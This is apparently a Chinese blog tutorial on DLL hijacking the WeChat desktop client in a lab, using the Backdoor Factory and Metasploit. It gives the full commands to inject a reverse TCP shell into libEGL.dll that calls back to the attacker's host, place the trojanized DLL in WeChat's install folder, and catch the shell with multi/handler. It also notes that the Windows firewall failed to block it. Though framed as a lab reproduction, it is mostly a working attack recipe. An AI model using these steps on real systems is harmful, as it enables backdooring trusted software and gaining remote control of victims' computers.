Windows dll劫持

我不是女神ヾ 2023-02-25 08:45 2阅读 0赞

# 一. 准备工作 #

## 1. 测试环境 ##

虚拟环境搭建：VMware Workstation 15 pro

网络模式：桥接模式

攻击机：kali Linux 2019.1 IP:192.168.43.143

靶机：Windows 7 ultimate sp1 x64 IP:192.168.43.109

微信版本：2.6.8

## 2. 使用工具 ##

[the-backdoor-factory(BDF)][the-backdoor-factory_BDF]：用于DLL注入

[Process Explorer][]：用于查找DLL文件

Metasploit

# 二. 复现过程 #

## 1.DLL注入 ##

### 1.1安装BDF ###

在kali系统中安装BDF

root@kali:~# git clone https://github.com/secretsquirrel/the-backdoor-factory.git
    root@kali:~# cd the-backdoor-factory/
    root@kali:~/the-backdoor-factory# ./install.sh

### 1.2获取DLL文件 ###

使用Process Explorer查找微信客户端需要的dll文件  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lvdXNoYW9kdW8_size_16_color_FFFFFF_t_70]  
理论上来讲路径在微信安装目录里的dll文件都可以使用，本文选择的是libEGL.dll。

### 1.3DLL注入 ###

把选择的DLL文件放入kali系统中，放置在the-backdoor-factory文件下内，运行如下命令

./backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 6666 -H 192.168.43.143

其中，-f 表示被劫持的DLL 文件，-s 表示shell 的类型，-P 表示DLL 要连接远程主机的端口，-H 表示DLL 连接的远程主机，注意参数的大小写问题。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lvdXNoYW9kdW8_size_16_color_FFFFFF_t_70 1]  
接下来选择注入类型，我这里只有一个类型可以选择，有的会有多种，可以自行尝试。在注入完成后，可以看到生成的文件在backdoored目录中。

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lvdXNoYW9kdW8_size_16_color_FFFFFF_t_70 2]

## 2.反弹shell ##

### 2.1将dll文件放回微信的安装目录中 ###

### 2.2使用Metasploit反弹shell ###

打开MSF，设置exploit和payload

use exploit/multi/handler
    set payload windows/shell_reverse_tcp

设置好lhost和lport之后，使用exploit运行，监听shell。此时，在靶机中打开微信客户端，即接收到shell。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lvdXNoYW9kdW8_size_16_color_FFFFFF_t_70 3]

靶机里是开着Windows防火墙的，但是依然没有拦住，但是由于是win7，win10还没有试，等哪天有空试一下，看看defender能不能拦住（如果dll报毒直接没戏，不报毒应该可以）。

[the-backdoor-factory_BDF]: https://github.com/secretsquirrel/the-backdoor-factory
[Process Explorer]: https://process-explorer.en.softonic.com/
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lvdXNoYW9kdW8_size_16_color_FFFFFF_t_70]: /images/20230209/ff292a903e1e4c209f28bee44c44babc.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lvdXNoYW9kdW8_size_16_color_FFFFFF_t_70 1]: /images/20230209/117107ae37044c12b1e2fd950c5687b3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lvdXNoYW9kdW8_size_16_color_FFFFFF_t_70 2]: https://img-blog.csdnimg.cn/20200711175135305.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lvdXNoYW9kdW8=,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lvdXNoYW9kdW8_size_16_color_FFFFFF_t_70 3]: https://img-blog.csdnimg.cn/20200711175459950.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lvdXNoYW9kdW8=,size_16,color_FFFFFF,t_70